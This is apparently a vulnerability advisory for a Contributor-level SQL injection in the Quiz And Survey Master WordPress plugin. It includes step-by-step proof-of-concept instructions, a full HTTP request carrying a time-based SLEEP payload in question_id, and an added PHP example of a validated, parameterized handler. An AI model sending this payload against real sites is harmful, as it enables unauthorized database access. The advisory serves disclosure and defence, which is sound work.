wpvulndb
Project Black
WPVDB-ID:E3EEE6BC-1F69-4BE1-B323-0C9B5FE7535E
Jun 10, 2024 - 12:00 a.m.

Quiz And Survey Master < 9.0.2 - Contributor+ SQLi

2024-06-10 00:00:00
Project Black
wpscan.com
sql injection
ajax vulnerability
contributor role

AI Score: 7.7 High (Confidence: Low)

EPSS: 0 Low (Percentile: 0.0%)

Description

The plugin does not validate and escape the question_id parameter in the qsm_bulk_delete_question_from_database AJAX action, leading to a SQL injection exploitable by users with the Contributor role and above.

PoC

  1. You will need a valid nonce for deletion of quiz questions.
  2. Sign in as a Contributor, create a quiz with at least one question.
  3. Edit the Quiz and click the “Delete All” button to fire off the right request with a valid nonce.
  4. Replace the question ID with the payload below to sleep for 5 seconds: (SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a)

Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: test.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://test.site/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 118
Origin: http://test.site
Connection: keep-alive
Cookie: Contributor_Cookie

action=qsm_bulk_delete_question_from_database&question_id=(SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a)&nonce=577a29f6f1
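
The description above names the missing control: question_id is neither validated nor escaped before it reaches the query. As an added example (not code from Quiz And Survey Master or from this advisory), here is how a bulk-delete AJAX handler can validate and bind such a parameter. The handler name, nonce action, capability, table and column are assumptions, as is the comma-separated ID format.

```php
<?php
// Added example: hypothetical handler, not the plugin's own code.
// Assumed names: example_bulk_delete_questions, the 'example_delete_questions'
// nonce action, the {prefix}example_questions table and its question_id column.
add_action( 'wp_ajax_example_bulk_delete_questions', 'example_bulk_delete_questions' );

function example_bulk_delete_questions() {
	global $wpdb;

	// A valid nonce shows the request came from the admin UI. It does not
	// make the submitted values trustworthy, so authorization and input
	// validation still follow.
	check_ajax_referer( 'example_delete_questions', 'nonce' );
	if ( ! current_user_can( 'edit_posts' ) ) { // assumed capability
		wp_send_json_error( 'forbidden', 403 );
	}

	$raw = isset( $_POST['question_id'] ) ? wp_unslash( $_POST['question_id'] ) : '';

	// Pattern to avoid (shown for contrast): the raw value becomes SQL text.
	// $wpdb->query( "DELETE FROM {$wpdb->prefix}example_questions WHERE question_id IN ($raw)" );

	// Validate: accept only a comma-separated list of decimal IDs.
	// \A and \z anchor the whole string, so a trailing newline is rejected too.
	if ( ! is_string( $raw ) || ! preg_match( '/\A\d+(?:,\d+)*\z/', $raw ) ) {
		wp_send_json_error( 'invalid question_id', 400 );
	}
	$ids = array_values( array_filter( array_map( 'absint', explode( ',', $raw ) ) ) );
	if ( empty( $ids ) ) {
		wp_send_json_error( 'invalid question_id', 400 );
	}

	// Bind: one %d placeholder per ID, so every value is cast to an integer
	// by $wpdb->prepare() instead of being concatenated into the statement.
	$placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
	$sql          = $wpdb->prepare(
		"DELETE FROM {$wpdb->prefix}example_questions WHERE question_id IN ($placeholders)",
		$ids
	);
	$deleted = $wpdb->query( $sql );

	wp_send_json_success( array( 'deleted' => (int) $deleted ) );
}
```

With this handler, a question_id value containing parentheses, spaces or SQL keywords fails the format check and the request ends with a 400 response before any query is built.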

| CPE | Name | Operator | Version |
| | | eq | 9.0.2 |
